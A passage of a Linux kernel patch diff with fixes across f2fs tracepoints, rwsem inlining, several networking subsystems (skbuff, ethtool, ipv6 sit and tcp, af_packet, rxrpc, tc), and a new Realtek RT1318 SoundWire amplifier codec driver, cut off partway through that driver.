+ 	TP_printk("dev = (%d,%d), ino = %lu, pgofs = %u, "
+-		"ext_info(fofs: %u, blk: %u, len: %u)",
++		"read_ext_info(fofs: %u, len: %u, blk: %u)",
+ 		show_dev_ino(__entry),
+ 		__entry->pgofs,
+ 		__entry->fofs,
+-		__entry->blk,
+-		__entry->len)
++		__entry->len,
++		__entry->blk)
+ );
+ 
+-TRACE_EVENT(f2fs_update_extent_tree_range,
++TRACE_EVENT(f2fs_update_read_extent_tree_range,
+ 
+-	TP_PROTO(struct inode *inode, unsigned int pgofs, block_t blkaddr,
+-						unsigned int len,
++	TP_PROTO(struct inode *inode, unsigned int pgofs, unsigned int len,
++						block_t blkaddr,
+ 						unsigned int c_len),
+ 
+-	TP_ARGS(inode, pgofs, blkaddr, len, c_len),
++	TP_ARGS(inode, pgofs, len, blkaddr, c_len),
+ 
+ 	TP_STRUCT__entry(
+ 		__field(dev_t,	dev)
+@@ -1637,67 +1641,73 @@ TRACE_EVENT(f2fs_update_extent_tree_range,
+ 		__entry->dev = inode->i_sb->s_dev;
+ 		__entry->ino = inode->i_ino;
+ 		__entry->pgofs = pgofs;
+-		__entry->blk = blkaddr;
+ 		__entry->len = len;
++		__entry->blk = blkaddr;
+ 		__entry->c_len = c_len;
+ 	),
+ 
+ 	TP_printk("dev = (%d,%d), ino = %lu, pgofs = %u, "
+-					"blkaddr = %u, len = %u, "
+-					"c_len = %u",
++				"len = %u, blkaddr = %u, c_len = %u",
+ 		show_dev_ino(__entry),
+ 		__entry->pgofs,
+-		__entry->blk,
+ 		__entry->len,
++		__entry->blk,
+ 		__entry->c_len)
+ );
+ 
+ TRACE_EVENT(f2fs_shrink_extent_tree,
+ 
+ 	TP_PROTO(struct f2fs_sb_info *sbi, unsigned int node_cnt,
+-						unsigned int tree_cnt),
++			unsigned int tree_cnt, enum extent_type type),
+ 
+-	TP_ARGS(sbi, node_cnt, tree_cnt),
++	TP_ARGS(sbi, node_cnt, tree_cnt, type),
+ 
+ 	TP_STRUCT__entry(
+ 		__field(dev_t,	dev)
+ 		__field(unsigned int, node_cnt)
+ 		__field(unsigned int, tree_cnt)
++		__field(enum extent_type, type)
+ 	),
+ 
+ 	TP_fast_assign(
+ 		__entry->dev = sbi->sb->s_dev;
+ 		__entry->node_cnt = node_cnt;
+ 		__entry->tree_cnt = tree_cnt;
++		__entry->type = type;
+ 	),
+ 
+-	TP_printk("dev = (%d,%d), shrunk: node_cnt = %u, tree_cnt = %u",
++	TP_printk("dev = (%d,%d), shrunk: node_cnt = %u, tree_cnt = %u, type = %s",
+ 		show_dev(__entry->dev),
+ 		__entry->node_cnt,
+-		__entry->tree_cnt)
++		__entry->tree_cnt,
++		__entry->type == EX_READ ? "Read" : "N/A")
+ );
+ 
+ TRACE_EVENT(f2fs_destroy_extent_tree,
+ 
+-	TP_PROTO(struct inode *inode, unsigned int node_cnt),
++	TP_PROTO(struct inode *inode, unsigned int node_cnt,
++				enum extent_type type),
+ 
+-	TP_ARGS(inode, node_cnt),
++	TP_ARGS(inode, node_cnt, type),
+ 
+ 	TP_STRUCT__entry(
+ 		__field(dev_t,	dev)
+ 		__field(ino_t,	ino)
+ 		__field(unsigned int, node_cnt)
++		__field(enum extent_type, type)
+ 	),
+ 
+ 	TP_fast_assign(
+ 		__entry->dev = inode->i_sb->s_dev;
+ 		__entry->ino = inode->i_ino;
+ 		__entry->node_cnt = node_cnt;
++		__entry->type = type;
+ 	),
+ 
+-	TP_printk("dev = (%d,%d), ino = %lu, destroyed: node_cnt = %u",
++	TP_printk("dev = (%d,%d), ino = %lu, destroyed: node_cnt = %u, type = %s",
+ 		show_dev_ino(__entry),
+-		__entry->node_cnt)
++		__entry->node_cnt,
++		__entry->type == EX_READ ? "Read" : "N/A")
+ );
+ 
+ DECLARE_EVENT_CLASS(f2fs_sync_dirty_inodes,
+diff --git a/kernel/locking/rwsem.c b/kernel/locking/rwsem.c
+index 84d5b649b95fe..92d8e2c4edda0 100644
+--- a/kernel/locking/rwsem.c
++++ b/kernel/locking/rwsem.c
+@@ -1251,7 +1251,7 @@ static struct rw_semaphore *rwsem_downgrade_wake(struct rw_semaphore *sem)
+ /*
+  * lock for reading
+  */
+-static inline int __down_read_common(struct rw_semaphore *sem, int state)
++static __always_inline int __down_read_common(struct rw_semaphore *sem, int state)
+ {
+ 	int ret = 0;
+ 	long count;
+@@ -1269,17 +1269,17 @@ out:
+ 	return ret;
+ }
+ 
+-static inline void __down_read(struct rw_semaphore *sem)
++static __always_inline void __down_read(struct rw_semaphore *sem)
+ {
+ 	__down_read_common(sem, TASK_UNINTERRUPTIBLE);
+ }
+ 
+-static inline int __down_read_interruptible(struct rw_semaphore *sem)
++static __always_inline int __down_read_interruptible(struct rw_semaphore *sem)
+ {
+ 	return __down_read_common(sem, TASK_INTERRUPTIBLE);
+ }
+ 
+-static inline int __down_read_killable(struct rw_semaphore *sem)
++static __always_inline int __down_read_killable(struct rw_semaphore *sem)
+ {
+ 	return __down_read_common(sem, TASK_KILLABLE);
+ }
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index 597c1f17d3889..ccfd9053754a9 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -1544,7 +1544,7 @@ int skb_copy_ubufs(struct sk_buff *skb, gfp_t gfp_mask)
+ {
+ 	int num_frags = skb_shinfo(skb)->nr_frags;
+ 	struct page *page, *head = NULL;
+-	int i, new_frags;
++	int i, order, psize, new_frags;
+ 	u32 d_off;
+ 
+ 	if (skb_shared(skb) || skb_unclone(skb, gfp_mask))
+@@ -1553,9 +1553,17 @@ int skb_copy_ubufs(struct sk_buff *skb, gfp_t gfp_mask)
+ 	if (!num_frags)
+ 		goto release;
+ 
+-	new_frags = (__skb_pagelen(skb) + PAGE_SIZE - 1) >> PAGE_SHIFT;
++	/* We might have to allocate high order pages, so compute what minimum
++	 * page order is needed.
++	 */
++	order = 0;
++	while ((PAGE_SIZE << order) * MAX_SKB_FRAGS < __skb_pagelen(skb))
++		order++;
++	psize = (PAGE_SIZE << order);
++
++	new_frags = (__skb_pagelen(skb) + psize - 1) >> (PAGE_SHIFT + order);
+ 	for (i = 0; i < new_frags; i++) {
+-		page = alloc_page(gfp_mask);
++		page = alloc_pages(gfp_mask | __GFP_COMP, order);
+ 		if (!page) {
+ 			while (head) {
+ 				struct page *next = (struct page *)page_private(head);
+@@ -1582,11 +1590,11 @@ int skb_copy_ubufs(struct sk_buff *skb, gfp_t gfp_mask)
+ 			vaddr = kmap_atomic(p);
+ 
+ 			while (done < p_len) {
+-				if (d_off == PAGE_SIZE) {
++				if (d_off == psize) {
+ 					d_off = 0;
+ 					page = (struct page *)page_private(page);
+ 				}
+-				copy = min_t(u32, PAGE_SIZE - d_off, p_len - done);
++				copy = min_t(u32, psize - d_off, p_len - done);
+ 				memcpy(page_address(page) + d_off,
+ 				       vaddr + p_off + done, copy);
+ 				done += copy;
+@@ -1602,7 +1610,7 @@ int skb_copy_ubufs(struct sk_buff *skb, gfp_t gfp_mask)
+ 
+ 	/* skb frags point to kernel buffers */
+ 	for (i = 0; i < new_frags - 1; i++) {
+-		__skb_fill_page_desc(skb, i, head, 0, PAGE_SIZE);
++		__skb_fill_page_desc(skb, i, head, 0, psize);
+ 		head = (struct page *)page_private(head);
+ 	}
+ 	__skb_fill_page_desc(skb, new_frags - 1, head, 0, d_off);
+diff --git a/net/ethtool/ioctl.c b/net/ethtool/ioctl.c
+index 038398d41a937..940c0e27be735 100644
+--- a/net/ethtool/ioctl.c
++++ b/net/ethtool/ioctl.c
+@@ -580,8 +580,8 @@ static int ethtool_get_link_ksettings(struct net_device *dev,
+ static int ethtool_set_link_ksettings(struct net_device *dev,
+ 				      void __user *useraddr)
+ {
++	struct ethtool_link_ksettings link_ksettings = {};
+ 	int err;
+-	struct ethtool_link_ksettings link_ksettings;
+ 
+ 	ASSERT_RTNL();
+ 
+diff --git a/net/ipv6/sit.c b/net/ipv6/sit.c
+index 70d81bba50939..3ffb6a5b1f82a 100644
+--- a/net/ipv6/sit.c
++++ b/net/ipv6/sit.c
+@@ -1095,12 +1095,13 @@ tx_err:
+ 
+ static void ipip6_tunnel_bind_dev(struct net_device *dev)
+ {
++	struct ip_tunnel *tunnel = netdev_priv(dev);
++	int t_hlen = tunnel->hlen + sizeof(struct iphdr);
+ 	struct net_device *tdev = NULL;
+-	struct ip_tunnel *tunnel;
++	int hlen = LL_MAX_HEADER;
+ 	const struct iphdr *iph;
+ 	struct flowi4 fl4;
+ 
+-	tunnel = netdev_priv(dev);
+ 	iph = &tunnel->parms.iph;
+ 
+ 	if (iph->daddr) {
+@@ -1123,14 +1124,15 @@ static void ipip6_tunnel_bind_dev(struct net_device *dev)
+ 		tdev = __dev_get_by_index(tunnel->net, tunnel->parms.link);
+ 
+ 	if (tdev && !netif_is_l3_master(tdev)) {
+-		int t_hlen = tunnel->hlen + sizeof(struct iphdr);
+ 		int mtu;
+ 
+ 		mtu = tdev->mtu - t_hlen;
+ 		if (mtu < IPV6_MIN_MTU)
+ 			mtu = IPV6_MIN_MTU;
+ 		WRITE_ONCE(dev->mtu, mtu);
++		hlen = tdev->hard_header_len + tdev->needed_headroom;
+ 	}
++	dev->needed_headroom = t_hlen + hlen;
+ }
+ 
+ static void ipip6_tunnel_update(struct ip_tunnel *t, struct ip_tunnel_parm *p,
+diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
+index c563a84d67b46..8d61efeab9c99 100644
+--- a/net/ipv6/tcp_ipv6.c
++++ b/net/ipv6/tcp_ipv6.c
+@@ -1065,7 +1065,7 @@ static void tcp_v6_send_reset(const struct sock *sk, struct sk_buff *skb)
+ 			if (np->repflow)
+ 				label = ip6_flowlabel(ipv6h);
+ 			priority = sk->sk_priority;
+-			txhash = sk->sk_hash;
++			txhash = sk->sk_txhash;
+ 		}
+ 		if (sk->sk_state == TCP_TIME_WAIT) {
+ 			label = cpu_to_be32(inet_twsk(sk)->tw_flowlabel);
+diff --git a/net/ncsi/ncsi-aen.c b/net/ncsi/ncsi-aen.c
+index b635c194f0a85..62fb1031763d1 100644
+--- a/net/ncsi/ncsi-aen.c
++++ b/net/ncsi/ncsi-aen.c
+@@ -165,6 +165,7 @@ static int ncsi_aen_handler_cr(struct ncsi_dev_priv *ndp,
+ 	nc->state = NCSI_CHANNEL_INACTIVE;
+ 	list_add_tail_rcu(&nc->link, &ndp->channel_queue);
+ 	spin_unlock_irqrestore(&ndp->lock, flags);
++	nc->modes[NCSI_MODE_TX_ENABLE].enable = 0;
+ 
+ 	return ncsi_process_next_channel(ndp);
+ }
+diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
+index ac9335d76fb73..2af2ab924d64a 100644
+--- a/net/packet/af_packet.c
++++ b/net/packet/af_packet.c
+@@ -2035,7 +2035,7 @@ retry:
+ 		goto retry;
+ 	}
+ 
+-	if (!dev_validate_header(dev, skb->data, len)) {
++	if (!dev_validate_header(dev, skb->data, len) || !skb->len) {
+ 		err = -EINVAL;
+ 		goto out_unlock;
+ 	}
+diff --git a/net/rxrpc/sendmsg.c b/net/rxrpc/sendmsg.c
+index d4e4e94f4f987..71e40f91dd398 100644
+--- a/net/rxrpc/sendmsg.c
++++ b/net/rxrpc/sendmsg.c
+@@ -736,7 +736,7 @@ int rxrpc_do_sendmsg(struct rxrpc_sock *rx, struct msghdr *msg, size_t len)
+ 		fallthrough;
+ 	case 1:
+ 		if (p.call.timeouts.hard > 0) {
+-			j = msecs_to_jiffies(p.call.timeouts.hard);
++			j = p.call.timeouts.hard * HZ;
+ 			now = jiffies;
+ 			j += now;
+ 			WRITE_ONCE(call->expect_term_by, j);
+diff --git a/net/sched/act_mirred.c b/net/sched/act_mirred.c
+index baeae5e5c8f0c..36395e5db3b40 100644
+--- a/net/sched/act_mirred.c
++++ b/net/sched/act_mirred.c
+@@ -262,7 +262,7 @@ static int tcf_mirred_act(struct sk_buff *skb, const struct tc_action *a,
+ 		goto out;
+ 	}
+ 
+-	if (unlikely(!(dev->flags & IFF_UP))) {
++	if (unlikely(!(dev->flags & IFF_UP)) || !netif_carrier_ok(dev)) {
+ 		net_notice_ratelimited("tc mirred to Houston: device %s is down\n",
+ 				       dev->name);
+ 		goto out;
+diff --git a/net/sched/cls_api.c b/net/sched/cls_api.c
+index 50566db45949b..7b2aa04a7cdfd 100644
+--- a/net/sched/cls_api.c
++++ b/net/sched/cls_api.c
+@@ -1483,6 +1483,7 @@ static int tcf_block_bind(struct tcf_block *block,
+ 
+ err_unroll:
+ 	list_for_each_entry_safe(block_cb, next, &bo->cb_list, list) {
++		list_del(&block_cb->driver_list);
+ 		if (i-- > 0) {
+ 			list_del(&block_cb->list);
+ 			tcf_block_playback_offloads(block, block_cb->cb,
+diff --git a/sound/soc/codecs/Kconfig b/sound/soc/codecs/Kconfig
+index 3f16ad1c37585..965ae55fa1607 100644
+--- a/sound/soc/codecs/Kconfig
++++ b/sound/soc/codecs/Kconfig
+@@ -199,6 +199,7 @@ config SND_SOC_ALL_CODECS
+ 	imply SND_SOC_RT715_SDCA_SDW
+ 	imply SND_SOC_RT1308_SDW
+ 	imply SND_SOC_RT1316_SDW
++	imply SND_SOC_RT1318_SDW
+ 	imply SND_SOC_RT9120
+ 	imply SND_SOC_SDW_MOCKUP
+ 	imply SND_SOC_SGTL5000
+@@ -1311,6 +1312,11 @@ config SND_SOC_RT1316_SDW
+ 	depends on SOUNDWIRE
+ 	select REGMAP_SOUNDWIRE
+ 
++config SND_SOC_RT1318_SDW
++	tristate "Realtek RT1318 Codec - SDW"
++	depends on SOUNDWIRE
++	select REGMAP_SOUNDWIRE
++
+ config SND_SOC_RT5514
+ 	tristate
+ 	depends on I2C
+diff --git a/sound/soc/codecs/Makefile b/sound/soc/codecs/Makefile
+index 9170ee1447dda..71d3ce5867e4f 100644
+--- a/sound/soc/codecs/Makefile
++++ b/sound/soc/codecs/Makefile
+@@ -196,6 +196,7 @@ snd-soc-rt1305-objs := rt1305.o
+ snd-soc-rt1308-objs := rt1308.o
+ snd-soc-rt1308-sdw-objs := rt1308-sdw.o
+ snd-soc-rt1316-sdw-objs := rt1316-sdw.o
++snd-soc-rt1318-sdw-objs := rt1318-sdw.o
+ snd-soc-rt274-objs := rt274.o
+ snd-soc-rt286-objs := rt286.o
+ snd-soc-rt298-objs := rt298.o
+@@ -551,6 +552,7 @@ obj-$(CONFIG_SND_SOC_RT1305)	+= snd-soc-rt1305.o
+ obj-$(CONFIG_SND_SOC_RT1308)	+= snd-soc-rt1308.o
+ obj-$(CONFIG_SND_SOC_RT1308_SDW)	+= snd-soc-rt1308-sdw.o
+ obj-$(CONFIG_SND_SOC_RT1316_SDW)	+= snd-soc-rt1316-sdw.o
++obj-$(CONFIG_SND_SOC_RT1318_SDW)	+= snd-soc-rt1318-sdw.o
+ obj-$(CONFIG_SND_SOC_RT274)	+= snd-soc-rt274.o
+ obj-$(CONFIG_SND_SOC_RT286)	+= snd-soc-rt286.o
+ obj-$(CONFIG_SND_SOC_RT298)	+= snd-soc-rt298.o
+diff --git a/sound/soc/codecs/rt1316-sdw.c b/sound/soc/codecs/rt1316-sdw.c
+index ed0a114363621..154b6179b6dcd 100644
+--- a/sound/soc/codecs/rt1316-sdw.c
++++ b/sound/soc/codecs/rt1316-sdw.c
+@@ -585,7 +585,7 @@ static int rt1316_sdw_pcm_hw_free(struct snd_pcm_substream *substream,
+  * slave_ops: callbacks for get_clock_stop_mode, clock_stop and
+  * port_prep are not defined for now
+  */
+-static struct sdw_slave_ops rt1316_slave_ops = {
++static const struct sdw_slave_ops rt1316_slave_ops = {
+ 	.read_prop = rt1316_read_prop,
+ 	.update_status = rt1316_update_status,
+ };
+diff --git a/sound/soc/codecs/rt1318-sdw.c b/sound/soc/codecs/rt1318-sdw.c
+new file mode 100644
+index 0000000000000..c6ec86e97a6e7
+--- /dev/null
++++ b/sound/soc/codecs/rt1318-sdw.c
+@@ -0,0 +1,884 @@
++// SPDX-License-Identifier: GPL-2.0-only
++//
++// rt1318-sdw.c -- rt1318 SDCA ALSA SoC amplifier audio driver
++//
++// Copyright(c) 2022 Realtek Semiconductor Corp.
++//
++//
++#include <linux/delay.h>
++#include <linux/device.h>
++#include <linux/pm_runtime.h>
++#include <linux/mod_devicetable.h>
++#include <linux/module.h>
++#include <linux/regmap.h>
++#include <linux/dmi.h>
++#include <linux/firmware.h>
++#include <sound/core.h>
++#include <sound/pcm.h>
++#include <sound/pcm_params.h>
++#include <sound/soc-dapm.h>
++#include <sound/initval.h>
++#include "rt1318-sdw.h"
++
++static const struct reg_sequence rt1318_blind_write[] = {
++	{ 0xc001, 0x43 },
++	{ 0xc003, 0xa2 },
++	{ 0xc004, 0x44 },
++	{ 0xc005, 0x44 },
++	{ 0xc006, 0x33 },
++	{ 0xc007, 0x64 },
++	{ 0xc320, 0x20 },
++	{ 0xf203, 0x18 },
++	{ 0xf211, 0x00 },
++	{ 0xf212, 0x26 },
++	{ 0xf20d, 0x17 },
++	{ 0xf214, 0x06 },
++	{ 0xf20e, 0x00 },
++	{ 0xf223, 0x7f },
++	{ 0xf224, 0xdb },
++	{ 0xf225, 0xee },
++	{ 0xf226, 0x3f },
++	{ 0xf227, 0x0f },
++	{ 0xf21a, 0x78 },
++	{ 0xf242, 0x3c },
++	{ 0xc321, 0x0b },
++	{ 0xc200, 0xd8 },
++	{ 0xc201, 0x27 },
++	{ 0xc202, 0x0f },
++	{ 0xf800, 0x20 },
++	{ 0xdf00, 0x10 },
++	{ 0xdf5f, 0x01 },
++	{ 0xdf60, 0xa7 },
++	{ 0xc400, 0x0e },
++	{ 0xc401, 0x43 },
++	{ 0xc402, 0xe0 },
++	{ 0xc403, 0x00 },
++	{ 0xc404, 0x4c },
++	{ 0xc407, 0x02 },
++	{ 0xc408, 0x3f },
++	{ 0xc300, 0x01 },
++	{ 0xc206, 0x78 },
++	{ 0xc203, 0x84 },
++	{ 0xc120, 0xc0 },
++	{ 0xc121, 0x03 },
++	{ 0xe000, 0x88 },
++	{ 0xc321, 0x09 },
++	{ 0xc322, 0x01 },
++	{ 0xe706, 0x0f },
++	{ 0xe707, 0x30 },
++	{ 0xe806, 0x0f },
++	{ 0xe807, 0x30 },
++	{ 0xed00, 0xb0 },
++	{ 0xce04, 0x02 },
++	{ 0xce05, 0x63 },
++	{ 0xce06, 0x68 },
++	{ 0xce07, 0x07 },
++	{ 0xcf04, 0x02 },
++	{ 0xcf05, 0x63 },
++	{ 0xcf06, 0x68 },
++	{ 0xcf07, 0x07 },
++	{ 0xce60, 0xe3 },
++	{ 0xc130, 0x51 },
++	{ 0xf102, 0x00 },
++	{ 0xf103, 0x00 },
++	{ 0xf104, 0xf5 },
++	{ 0xf105, 0x06 },
++	{ 0xf109, 0x9b },
++	{ 0xf10a, 0x0b },
++	{ 0xf10b, 0x4c },
++	{ 0xf10b, 0x5c },
++	{ 0xf102, 0x00 },
++	{ 0xf103, 0x00 },
++	{ 0xf104, 0xf5 },
++	{ 0xf105, 0x0b },
++	{ 0xf109, 0x03 },
++	{ 0xf10a, 0x0b },
++	{ 0xf10b, 0x4c },
++	{ 0xf10b, 0x5c },
++	{ 0xf102, 0x00 },
++	{ 0xf103, 0x00 },
++	{ 0xf104, 0xf5 },
++	{ 0xf105, 0x0c },
++	{ 0xf109, 0x7f },
++	{ 0xf10a, 0x0b },
++	{ 0xf10b, 0x4c },
++	{ 0xf10b, 0x5c },
++
++	{ 0xe604, 0x00 },
++	{ 0xdb00, 0x0c },
++	{ 0xdd00, 0x0c },
++	{ 0xdc19, 0x00 },
++	{ 0xdc1a, 0xff },
++	{ 0xdc1b, 0xff },
++	{ 0xdc1c, 0xff },
++	{ 0xdc1d, 0x00 },
++	{ 0xdc1e, 0x00 },
++	{ 0xdc1f, 0x00 },
++	{ 0xdc20, 0xff },
++	{ 0xde19, 0x00 },
++	{ 0xde1a, 0xff },
++	{ 0xde1b, 0xff },
++	{ 0xde1c, 0xff },
++	{ 0xde1d, 0x00 },
++	{ 0xde1e, 0x00 },
++	{ 0xde1f, 0x00 },
++	{ 0xde20, 0xff },
++	{ 0xdb32, 0x00 },
++	{ 0xdd32, 0x00 },
++	{ 0xdb33, 0x0a },
++	{ 0xdd33, 0x0a },
++	{ 0xdb34, 0x1a },
++	{ 0xdd34, 0x1a },
++	{ 0xdb17, 0xef },
++	{ 0xdd17, 0xef },
++	{ 0xdba7, 0x00 },
++	{ 0xdba8, 0x64 },
++	{ 0xdda7, 0x00 },
++	{ 0xdda8, 0x64 },
++	{ 0xdb19, 0x40 },
++	{ 0xdd19, 0x40 },
++	{ 0xdb00, 0x4c },
++	{ 0xdb01, 0x79 },
++	{ 0xdd01, 0x79 },
++	{ 0xdb04, 0x05 },
++	{ 0xdb05, 0x03 },
++	{ 0xdd04, 0x05 },
++	{ 0xdd05, 0x03 },
++	{ 0xdbbb, 0x09 },
++	{ 0xdbbc, 0x30 },
++	{ 0xdbbd, 0xf0 },
++	{ 0xdbbe, 0xf1 },
++	{ 0xddbb, 0x09 },
++	{ 0xddbc, 0x30 },
++	{ 0xddbd, 0xf0 },
++	{ 0xddbe, 0xf1 },
++	{ 0xdb01, 0x79 },
++	{ 0xdd01, 0x79 },
++	{ 0xdc52, 0xef },
++	{ 0xde52, 0xef },
++	{ 0x2f55, 0x22 },
++};
++
++static const struct reg_default rt1318_reg_defaults[] = {
++	{ 0x3000, 0x00 },
++	{ 0x3004, 0x01 },
++	{ 0x3005, 0x23 },
++	{ 0x3202, 0x00 },
++	{ 0x3203, 0x01 },
++	{ 0x3206, 0x00 },
++	{ 0xc000, 0x00 },
++	{ 0xc001, 0x43 },
++	{ 0xc003, 0x22 },
++	{ 0xc004, 0x44 },
++	{ 0xc005, 0x44 },
++	{ 0xc006, 0x33 },
++	{ 0xc007, 0x64 },
++	{ 0xc008, 0x05 },
++	{ 0xc00a, 0xfc },
++	{ 0xc00b, 0x0f },
++	{ 0xc00c, 0x0e },
++	{ 0xc00d, 0xef },
++	{ 0xc00e, 0xe5 },
++	{ 0xc00f, 0xff },
++	{ 0xc120, 0xc0 },
++	{ 0xc121, 0x00 },
++	{ 0xc122, 0x00 },
++	{ 0xc123, 0x14 },
++	{ 0xc125, 0x00 },
++	{ 0xc200, 0x00 },
++	{ 0xc201, 0x00 },
++	{ 0xc202, 0x00 },
++	{ 0xc203, 0x04 },
++	{ 0xc204, 0x00 },
++	{ 0xc205, 0x00 },
++	{ 0xc206, 0x68 },
++	{ 0xc207, 0x70 },
++	{ 0xc208, 0x00 },
++	{ 0xc20a, 0x00 },
++	{ 0xc20b, 0x01 },
++	{ 0xc20c, 0x7f },
++	{ 0xc20d, 0x01 },
++	{ 0xc20e, 0x7f },
++	{ 0xc300, 0x00 },
++	{ 0xc301, 0x00 },
++	{ 0xc303, 0x80 },
++	{ 0xc320, 0x00 },
++	{ 0xc321, 0x09 },
++	{ 0xc322, 0x02 },
++	{ 0xc410, 0x04 },
++	{ 0xc430, 0x00 },
++	{ 0xc431, 0x00 },
++	{ 0xca00, 0x10 },
++	{ 0xca01, 0x00 },
++	{ 0xca02, 0x0b },
++	{ 0xca10, 0x10 },
++	{ 0xca11, 0x00 },
++	{ 0xca12, 0x0b },
++	{ 0xdd93, 0x00 },
++	{ 0xdd94, 0x64 },
++	{ 0xe300, 0xa0 },
++	{ 0xed00, 0x80 },
++	{ 0xed01, 0x0f },
++	{ 0xed02, 0xff },
++	{ 0xed03, 0x00 },
++	{ 0xed04, 0x00 },
++	{ 0xed05, 0x0f },
++	{ 0xed06, 0xff },
++	{ 0xf010, 0x10 },
++	{ 0xf011, 0xec },
++	{ 0xf012, 0x68 },
++	{ 0xf013, 0x21 },
++	{ 0xf800, 0x00 },
++	{ 0xf801, 0x12 },
++	{ 0xf802, 0xe0 },
++	{ 0xf803, 0x2f },
++	{ 0xf804, 0x00 },
++	{ 0xf805, 0x00 },
++	{ 0xf806, 0x07 },
++	{ 0xf807, 0xff },
++	{ SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_UDMPU21, RT1318_SDCA_CTL_UDMPU_CLUSTER, 0), 0x00 },
++	{ SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_FU21, RT1318_SDCA_CTL_FU_MUTE, CH_L), 0x01 },
++	{ SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_FU21, RT1318_SDCA_CTL_FU_MUTE, CH_R), 0x01 },
++	{ SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_PDE23, RT1318_SDCA_CTL_REQ_POWER_STATE, 0), 0x03 },
++	{ SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_CS21, RT1318_SDCA_CTL_SAMPLE_FREQ_INDEX, 0), 0x09 },
++};
++
++static bool rt1318_readable_register(struct device *dev, unsigned int reg)
++{
++	switch (reg) {
++	case 0x2f55:
++	case 0x3000:
++	case 0x3004 ... 0x3005:
++	case 0x3202 ... 0x3203:
++	case 0x3206:
++	case 0xc000 ... 0xc00f:
++	case 0xc120 ... 0xc125:
++	case 0xc200 ... 0xc20e:
++	case 0xc300 ... 0xc303:
++	case 0xc320 ... 0xc322:
++	case 0xc410:
++	case 0xc430 ... 0xc431:
++	case 0xca00 ... 0xca02:
++	case 0xca10 ... 0xca12:
++	case 0xcb00 ... 0xcb0b:
++	case 0xcc00 ... 0xcce5:
++	case 0xcd00 ... 0xcde5:
++	case 0xce00 ... 0xce6a:
++	case 0xcf00 ... 0xcf53:
++	case 0xd000 ... 0xd0cc:
++	case 0xd100 ... 0xd1b9:
++	case 0xdb00 ... 0xdc53:
++	case 0xdd00 ... 0xde53:
++	case 0xdf00 ... 0xdf6b:
++	case 0xe300:
++	case 0xeb00 ... 0xebcc:
++	case 0xec00 ... 0xecb9:
++	case 0xed00 ... 0xed06:
++	case 0xf010 ... 0xf014:
++	case 0xf800 ... 0xf807:
++	case SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_UDMPU21, RT1318_SDCA_CTL_UDMPU_CLUSTER, 0):
++	case SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_FU21, RT1318_SDCA_CTL_FU_MUTE, CH_L):
++	case SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_FU21, RT1318_SDCA_CTL_FU_MUTE, CH_R):
++	case SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_PDE23, RT1318_SDCA_CTL_REQ_POWER_STATE, 0):
++	case SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_CS21, RT1318_SDCA_CTL_SAMPLE_FREQ_INDEX, 0):
++	case SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_SAPU, RT1318_SDCA_CTL_SAPU_PROTECTION_MODE, 0):
++	case SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_SAPU, RT1318_SDCA_CTL_SAPU_PROTECTION_STATUS, 0):
++		return true;
++	default:
++		return false;
++	}
++}
++
++static bool rt1318_volatile_register(struct device *dev, unsigned int reg)
++{
++	switch (reg) {
++	case 0x2f55:
++	case 0x3000 ... 0x3001:
++	case 0xc000:
++	case 0xc301:
++	case 0xc410:
++	case 0xc430 ... 0xc431:
++	case 0xdb06:
++	case 0xdb12:
++	case 0xdb1d ... 0xdb1f:
++	case 0xdb35:
++	case 0xdb37:
++	case 0xdb8a ... 0xdb92:
++	case 0xdbc5 ... 0xdbc8:
++	case 0xdc2b ... 0xdc49:
++	case 0xdd0b:
++	case 0xdd12:
++	case 0xdd1d ... 0xdd1f:
++	case 0xdd35:
++	case 0xdd8a ... 0xdd92:
++	case 0xddc5 ... 0xddc8:
++	case 0xde2b ... 0xde44:
++	case 0xdf4a ... 0xdf55:
++	case 0xe224 ... 0xe23b:
++	case 0xea01:
++	case 0xebc5:
++	case 0xebc8:
++	case 0xebcb ... 0xebcc:
++	case 0xed03 ... 0xed06:
++	case 0xf010 ... 0xf014:
++	case SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_SAPU, RT1318_SDCA_CTL_SAPU_PROTECTION_MODE, 0):
++	case SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_SAPU, RT1318_SDCA_CTL_SAPU_PROTECTION_STATUS, 0):
++		return true;
++	default:
++		return false;
++	}
++}
++
++static const struct regmap_config rt1318_sdw_regmap = {
++	.reg_bits = 32,
++	.val_bits = 8,
++	.readable_reg = rt1318_readable_register,
++	.volatile_reg = rt1318_volatile_register,
++	.max_register = 0x41081488,
++	.reg_defaults = rt1318_reg_defaults,
++	.num_reg_defaults = ARRAY_SIZE(rt1318_reg_defaults),
++	.cache_type = REGCACHE_RBTREE,
++	.use_single_read = true,
++	.use_single_write = true,
++};
++
++static int rt1318_read_prop(struct sdw_slave *slave)
++{
++	struct sdw_slave_prop *prop = &slave->prop;
++	int nval;
++	int i, j;
++	u32 bit;
++	unsigned long addr;
++	struct sdw_dpn_prop *dpn;
++
++	prop->scp_int1_mask = SDW_SCP_INT1_BUS_CLASH | SDW_SCP_INT1_PARITY;
++	prop->quirks = SDW_SLAVE_QUIRKS_INVALID_INITIAL_PARITY;
++	prop->is_sdca = true;
++
++	prop->paging_support = true;
++
++	/* first we need to allocate memory for set bits in port lists */
++	prop->source_ports = BIT(2);
++	prop->sink_ports = BIT(1);
++
++	nval = hweight32(prop->source_ports);
